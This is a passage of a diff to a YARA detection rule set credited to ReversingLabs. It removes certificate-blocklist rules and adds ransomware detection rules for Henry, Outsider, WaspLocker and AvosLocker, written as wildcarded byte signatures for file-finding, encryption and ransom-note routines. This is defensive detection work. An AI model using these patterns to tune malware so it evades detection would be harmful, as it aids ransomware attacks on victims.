?? ?? FF 30 FF 77 ?? + FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? + ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF + 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? + ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 + B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? + ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 + 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 + 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D + 4D ?? E8 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ?? 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF B7 + ?? ?? ?? ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? + ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF B7 ?? ?? ?? ?? FF D3 8B F0 8D + 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D + ?? E8 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ?? 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF B7 ?? + ?? ?? ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? + ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF B7 ?? ?? ?? ?? FF D3 8B F0 8D 4D + ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? + E8 ?? ?? ?? ?? FF 30 FF B7 ?? ?? ?? ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 6A ?? 8D B7 ?? ?? ?? ?? FF 30 8B 47 ?? 6A ?? 56 FF D0 85 C0 8D 4D ?? 0F 94 C3 E8 + ?? ?? ?? ?? 84 DB 74 ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? + FF 30 8B 47 ?? 6A ?? 56 FF D0 85 C0 8D 4D ?? 0F 94 C3 E8 ?? ?? ?? ?? 84 DB 0F 85 ?? + ?? ?? ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CHAIKA, TOV" and (pe.signatures[i].serial=="00:c0:4f:8f:1e:00:c6:9e:96:a5:1b:f1:4a:ab:1c:6a:e0" or pe.signatures[i].serial=="c0:4f:8f:1e:00:c6:9e:96:a5:1b:f1:4a:ab:1c:6a:e0") and 1551398400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and $search_files and $previous_encrypt_files and $encrypt_files } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_23F537Ce13C6Cccdfd3F8Ce81Fb981Cb : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Henry : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Henry ransomware." author = "ReversingLabs" - id = "f48b7818-5b34-5609-822a-39a2e7fb44c5" - date = "2023-11-08" - modified = "2023-11-08" + id = "63627f2b-3205-5790-ba97-8e0d1da39d7c" + date = "2021-06-14" + modified = "2021-06-14" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3434-L3450" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d347bce3eddd0cac276a7504955f0342ae44fd93d238e514af5b1fdc208b68fc" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Henry.yara#L1-L80" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e6ab2a8a344d40407118e29ff78f5a0144f42a0fbdee19a80b341b59f056d292" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Henry" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ISECURE GROUP PTY LTD" and pe.signatures[i].serial=="23:f5:37:ce:13:c6:cc:cd:fd:3f:8c:e8:1f:b9:81:cb" and 1566086400<=pe.signatures[i].not_after) -} -import "pe" + strings: + $find_files = { + 02 6F ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 08 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? + ?? ?? DE ?? 26 DE ?? 07 17 58 0B 07 06 8E 69 32 ?? 02 6F ?? ?? ?? ?? 0D 16 0B 38 ?? ?? + ?? ?? 09 07 9A 13 ?? 11 ?? 6F ?? ?? ?? ?? 19 17 73 ?? ?? ?? ?? 25 6F ?? ?? ?? ?? D4 8D + ?? ?? ?? ?? 13 ?? 25 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 26 6F ?? ?? ?? ?? 11 ?? 6F ?? + ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? + 28 ?? ?? ?? ?? 18 18 73 ?? ?? ?? ?? 25 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 6F ?? ?? ?? + ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 07 17 58 0B 07 09 8E 69 3F ?? ?? + ?? ?? 2A + } + $encrypt_files = { + 02 8E 2D ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 03 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 73 + ?? ?? ?? ?? 7A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 28 ?? + ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 03 08 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 1F ?? 6F ?? ?? ?? + ?? 07 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 73 ?? ?? ?? ?? 25 02 16 02 8E 69 6F ?? ?? ?? + ?? 25 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 0A 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? + 25 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 FE ?? 09 6F ?? ?? ?? ?? DC 06 2A + } + $setup_environment = { + 02 28 ?? ?? ?? ?? 1B 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 73 + ?? ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 28 + ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? + ?? ?? 02 28 ?? ?? ?? ?? 2A + } + $init_components = { + 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 02 + 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 22 ?? ?? ?? ?? 16 19 + 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 1F ?? 73 + ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? + ?? ?? 20 ?? ?? ?? ?? 1F ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 16 6F ?? ?? + ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? + ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 22 ?? ?? ?? ?? 16 19 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? + 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 1F ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 + 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 20 ?? ?? + ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ?? + ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 22 ?? ?? ?? ?? 22 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? + ?? ?? ?? 02 17 28 ?? ?? ?? ?? 02 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? + ?? ?? 02 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 02 7B ?? ?? + ?? ?? 6F ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? + 02 02 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 16 28 ?? ?? ?? ?? 02 28 ?? ?? + ?? ?? 2A + } -rule REVERSINGLABS_Cert_Blocklist_73Ecfdbb99Aec176Ddfcf7958D120E1A : INFO FILE + condition: + uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ($setup_environment) and ($init_components) +} +rule REVERSINGLABS_Win32_Ransomware_Outsider : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Outsider ransomware." author = "ReversingLabs" - id = "84e20878-e4ea-53a5-9c1b-04f3c66276de" - date = "2023-11-08" - modified = "2023-11-08" + id = "44edccb1-9e2a-5ff9-b4b5-72ceec2f7947" + date = "2020-10-23" + modified = "2020-10-23" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3452-L3468" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d911156707cef97acf79c096b5d4a4db166ddf05237168f1ecffb0c0a2ebd8fa" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Outsider.yara#L1-L88" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "80c5a93b5b72b7b66e36f1726486b0c7620588d05bd925510d76f020a40b124c" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Outsider" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8D 45 ?? 8B D9 50 6A ?? 5E 56 FF 35 ?? ?? ?? ?? + 89 5D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50 + FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 8D 55 ?? 89 75 ?? 8B CF 2B + D7 8A 04 0A 88 01 41 83 EE ?? 75 ?? 6A ?? 8D 45 ?? 50 57 56 6A ?? 56 FF 35 ?? ?? ?? + ?? FF 15 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 6A ?? 56 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? + ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 89 75 ?? 89 75 ?? 53 FF 15 ?? ?? ?? ?? 8D + 04 43 83 E8 ?? 66 83 38 ?? 75 ?? FF B6 ?? ?? ?? ?? 2B C3 83 C0 ?? D1 F8 8D 04 43 50 + FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF B6 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 75 ?? + 8B F0 FF 15 ?? ?? ?? ?? 3B C6 74 ?? 8B 75 ?? 83 C6 ?? 89 75 ?? 83 FE ?? 72 ?? EB ?? + C7 45 ?? ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D6 50 FF 15 ?? ?? ?? + ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 7D ?? 8B D8 33 C0 50 8D 45 ?? 50 68 ?? ?? ?? + ?? 53 57 FF 15 ?? ?? ?? ?? 8B 4D ?? 33 C0 89 4D ?? 3B C8 76 ?? 8B F8 8B C7 25 ?? ?? + ?? ?? 79 ?? 48 83 C8 ?? 40 89 45 ?? 75 ?? 8B C7 99 83 E2 ?? 03 C2 C1 F8 ?? 99 52 50 + } + $encrypt_files_p2 = { + 51 51 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 8B 45 ?? 8A 84 05 + ?? ?? ?? ?? 30 04 1F 47 8B C7 99 85 D2 72 ?? 77 ?? 3B C1 72 ?? 8B 4D ?? 8B 7D ?? 6A + ?? F7 D9 8B C1 6A ?? 99 52 50 57 FF 15 ?? ?? ?? ?? 33 C0 50 8D 45 ?? 50 FF 75 ?? 53 + 57 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 81 7D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 53 33 + C0 50 FF D6 50 FF 15 ?? ?? ?? ?? 8B 7D ?? 8B 5D ?? 6A ?? 33 C0 C7 45 ?? ?? ?? ?? ?? + 50 0F 57 C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 33 C0 50 8D + 45 ?? 50 6A ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 33 C0 50 8D 45 ?? 50 6A ?? 57 + FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D6 50 + FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 68 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 53 FF 15 ?? ?? ?? ?? 56 33 F6 56 FF 15 ?? ?? ?? ?? + 50 FF 15 ?? ?? ?? ?? EB ?? 33 F6 57 56 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 5F 5E + 5B 8B E5 5D C3 + } + $find_files = { + 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 57 68 ?? ?? ?? ?? 6A ?? FF + D3 50 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 83 F8 ?? + 0F 84 ?? ?? ?? ?? 8B D8 33 FF FF B7 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 + C0 0F 84 ?? ?? ?? ?? 83 C7 ?? 83 FF ?? 72 ?? 8D 44 24 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? A8 ?? 74 ?? 68 ?? ?? ?? ?? + 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? + ?? ?? ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 59 EB ?? 8B 44 24 ?? A8 ?? 74 ?? 68 ?? ?? ?? + ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 + ?? ?? ?? ?? 85 C0 74 ?? 8B CE E8 ?? ?? ?? ?? 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 85 + C0 0F 85 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B CE E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 56 + 6A ?? FF D3 50 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 + } + $enum_resources = { + 55 8B EC 83 E4 ?? 83 EC ?? 83 0C 24 ?? 8D 44 24 ?? 53 56 57 50 FF 75 ?? C7 44 24 ?? + ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? + 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 ?? EB ?? 33 + DB 39 5C 24 ?? 76 ?? 8D 77 ?? F6 46 ?? ?? 74 ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? EB ?? FF + 36 E8 ?? ?? ?? ?? 43 83 C6 ?? 59 3B 5C 24 ?? 72 ?? 8D 44 24 ?? 50 57 8D 44 24 ?? 50 + FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? + ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MHOW PTY LTD" and pe.signatures[i].serial=="73:ec:fd:bb:99:ae:c1:76:dd:fc:f7:95:8d:12:0e:1a" and 1566864000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($enum_resources) and ($find_files) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_675129Bb174A5B05E330Cc09F8Bbd70A : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Wasplocker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects WaspLocker ransomware." author = "ReversingLabs" - id = "97046206-efc4-58dd-a9df-4966bad3902d" - date = "2023-11-08" - modified = "2023-11-08" + id = "596bf965-700a-58f5-b0e5-61ec57c23a3e" + date = "2022-06-28" + modified = "2022-06-28" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3470-L3486" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d989ea5233e8a64bffa0e29645c3458ef1f5173158ced7814c3b473b92ef49f4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.WaspLocker.yara#L1-L76" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "852ec52328fca36d651e3176ac33a57ce26cefecadc2aad27235548e5b9813c1" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "WaspLocker" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 50 50 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? 51 50 50 50 56 FF 15 ?? ?? ?? ?? 85 C0 + 75 ?? 57 53 E8 ?? ?? ?? ?? 8D 4E ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? + A8 ?? 75 ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 50 FF 15 + ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 3B 85 ?? ?? ?? ?? 76 ?? 8D 85 ?? ?? ?? ?? + 50 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 2B 95 ?? ?? ?? ?? 59 03 C2 B9 ?? ?? ?? ?? 3B C1 + 7D ?? 8D 85 ?? ?? ?? ?? 2B CA 50 51 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 + 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? EB ?? 85 DB 0F 84 + ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? 85 FF 75 ?? 33 C0 EB ?? 57 E8 ?? ?? ?? ?? 59 50 57 + 8D 4B ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 4E ?? E8 ?? ?? ?? ?? 33 C0 40 E8 ?? ?? ?? + ?? C2 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 + F6 89 75 ?? 33 FF 89 7D ?? 21 75 ?? 21 75 ?? 39 3D ?? ?? ?? ?? 75 ?? 8D 45 ?? 50 E8 + ?? ?? ?? ?? 8B F8 89 7D ?? 85 FF 74 ?? FF 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B F0 89 75 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? C2 + } + $drop_aux_files = { + A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 6A ?? 66 89 41 ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 56 6A ?? FF 15 ?? ?? + ?? ?? 89 85 ?? ?? ?? ?? 85 C0 74 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 50 FF 15 + ?? ?? ?? ?? 8B F8 85 FF 74 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B + F0 83 C4 ?? 85 F6 74 ?? 56 FF B5 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 6A ?? 6A ?? 56 + E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 15 + ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 + ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? + ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? + ?? ?? 56 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 6A ?? 56 FF 15 ?? ?? + ?? ?? 50 89 85 ?? ?? ?? ?? E8 + } + $drop_ransom_notes = { + 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0 + 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E8 + ?? ?? ?? ?? 8B C8 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8B 40 ?? FF D0 83 C0 ?? 89 85 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 68 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? + 8B C8 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8B 40 ?? FF D0 83 C0 ?? 89 85 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? B9 ?? ?? ?? ?? 8D + 51 ?? 90 8A 01 41 84 C0 75 ?? 2B CA 51 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B C8 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8B 40 ?? FF D0 83 + C0 ?? 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? + 84 C0 75 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ALEX & CO PTY LIMITED" and pe.signatures[i].serial=="67:51:29:bb:17:4a:5b:05:e3:30:cc:09:f8:bb:d7:0a" and 1565568000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ($drop_aux_files) and ($drop_ransom_notes) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_De13Fe2Dbb8F890287E1780Aff6Ffd22 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Avoslocker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects AvosLocker ransomware." author = "ReversingLabs" - id = "d2b15920-76ae-54e4-988c-278a3622ec52" - date = "2023-11-08" - modified = "2023-11-08" + id = "a803283d-6424-5a64-89e6-c73a3322ba1e" + date = "2021-10-22" + modified = "2021-10-22" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3488-L3504" - license_url = 